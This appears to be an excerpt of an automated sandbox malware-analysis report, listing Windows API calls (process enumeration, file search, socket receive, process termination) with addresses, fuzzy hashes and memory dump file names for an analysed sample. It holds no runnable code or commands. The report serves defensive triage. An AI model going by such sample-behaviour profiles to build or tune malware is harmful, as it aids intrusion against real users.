                                                                                                                                                                        • API ID: recv
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                        • Opcode ID: e1052a574a44210ed985d85ac1c46d1ff5235fea58484dea75272b1fa8954b41
                                                                                                                                                                        • Instruction ID: 4983c7f9da2fc6ac2c5c9174da6ec2c35ae911926e7d3fc7241c3079bda33f4b
                                                                                                                                                                        • Opcode Fuzzy Hash: e1052a574a44210ed985d85ac1c46d1ff5235fea58484dea75272b1fa8954b41
                                                                                                                                                                        • Instruction Fuzzy Hash: DDD05E30304601A7E729DB0DCC20F277AD2EBC4780F10403CB145862E2D6A0EC51C689
                                                                                                                                                                        APIs
                                                                                                                                                                        • Process32Next.KERNEL32(?,?), ref: 004322EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                        • Opcode ID: f1a7e04dffbaed30dbeea662e4c1f3855788187fec44ff9b4e6bd0a04cad32ab
                                                                                                                                                                        • Instruction ID: b386908dd5407730fbed8e13b816bbe60387e8482b7c81fb8bd3be2812ac8047
                                                                                                                                                                        • Opcode Fuzzy Hash: f1a7e04dffbaed30dbeea662e4c1f3855788187fec44ff9b4e6bd0a04cad32ab
                                                                                                                                                                        • Instruction Fuzzy Hash: B9D05E702192539FE708DF68CC69D2533E1FB08205B04447CF452C7261FB30E801DB01
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00439A2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: 9ab9f7ccb272539f927e15ffd3bcac00d97b8e44c3a332959080f7242ed091ac
                                                                                                                                                                        • Instruction ID: 7b65b1224dafe667902ccfee81bf971f8f4eec0931a7b407e6769250000b8759
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ab9f7ccb272539f927e15ffd3bcac00d97b8e44c3a332959080f7242ed091ac
                                                                                                                                                                        • Instruction Fuzzy Hash: A4D017707021089FEF98CF18D9A1F6A33F2AB98300F10416CEA06C72A0EAB4AC418F14
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                        • Opcode ID: 03d5a62a8865a22e922ee24f28ec4e514bd182ba475d9ee30d3a8d5439378a25
                                                                                                                                                                        • Instruction ID: a6e8a5867875d86b053a5a100444789fb2eba92d4a2d50b67504112a7ddd4b7a
                                                                                                                                                                        • Opcode Fuzzy Hash: 03d5a62a8865a22e922ee24f28ec4e514bd182ba475d9ee30d3a8d5439378a25
                                                                                                                                                                        • Instruction Fuzzy Hash: BED0C936301552DFD308AB18DC69A3937E6EF49251B124029E816DBAD0EB61DC038B05
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043391F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateGlobalStream
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2244384528-0
                                                                                                                                                                        • Opcode ID: 7db6cecca822eafc5e761e19389be8e5f0a01556ce790b51e505aaeacc1aeba8
                                                                                                                                                                        • Instruction ID: 36c0bedffeb522967653a2c643f8bd60dfd6de0e6368a69daa1c5b12d29803ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 7db6cecca822eafc5e761e19389be8e5f0a01556ce790b51e505aaeacc1aeba8
                                                                                                                                                                        • Instruction Fuzzy Hash: 4AD05231304018AFFB08CB18C889F6973A0AB00B02F001129FB05EB2D1E6A0AC008B19
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                        • Opcode ID: 52cb4b924477ad297b9d310a7b79312e9367900fe270d42d3f16c689824009af
                                                                                                                                                                        • Instruction ID: 91410154d8b1c219705c3ccea44c82065f4db187a1e621bdf11afb1888c18072
                                                                                                                                                                        • Opcode Fuzzy Hash: 52cb4b924477ad297b9d310a7b79312e9367900fe270d42d3f16c689824009af
                                                                                                                                                                        • Instruction Fuzzy Hash: F3D012B53019019F8B2C8B15EC6DE6E33A8FF46210B05406DF8078B6F0DE605852CE89
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                        • Opcode ID: 1e5c3e7a63e0c86559881461c126636028b4a77ddaf62310fd858a4392e47ecb
                                                                                                                                                                        • Instruction ID: ebde0ec059129b2a44436a79e91c780e06681a571f05695f4905cd54bded5e38
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e5c3e7a63e0c86559881461c126636028b4a77ddaf62310fd858a4392e47ecb
                                                                                                                                                                        • Instruction Fuzzy Hash: BED012352408028F8300AF6DEC98E2A33ECAF4920031280A8F801C72A2DA20EC208A1A
                                                                                                                                                                        APIs
                                                                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00434AC3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                                                        • Opcode ID: a1d6840de33cba9a2cf33eee3e17990fba529f43d3e8edd4098ffbca4f2a1a1c
                                                                                                                                                                        • Instruction ID: 9c405027916fdae13b027183f18ec21c118ada088c9347a0a4b4f3e9f9f131ad
                                                                                                                                                                        • Opcode Fuzzy Hash: a1d6840de33cba9a2cf33eee3e17990fba529f43d3e8edd4098ffbca4f2a1a1c
                                                                                                                                                                        • Instruction Fuzzy Hash: BDC08C32100C009FC3159B60DD8CBAA3378FB88700F000002F24A8F0F0C3A42403DF0A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 51fa24fc811e2ae57d14ec64acf3f7df75b46b42d95a20282ed8d6bd5c31a70e
                                                                                                                                                                        • Instruction ID: a0fb99e7e1a8e354e03aa523d267beb74399a57a338aebf0b4d66e42b4dfb09f
                                                                                                                                                                        • Opcode Fuzzy Hash: 51fa24fc811e2ae57d14ec64acf3f7df75b46b42d95a20282ed8d6bd5c31a70e
                                                                                                                                                                        • Instruction Fuzzy Hash: E4017536A00204CFCB01DFBCDC419D9B7B4FF9E314B088251E915E7221E7709A95CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
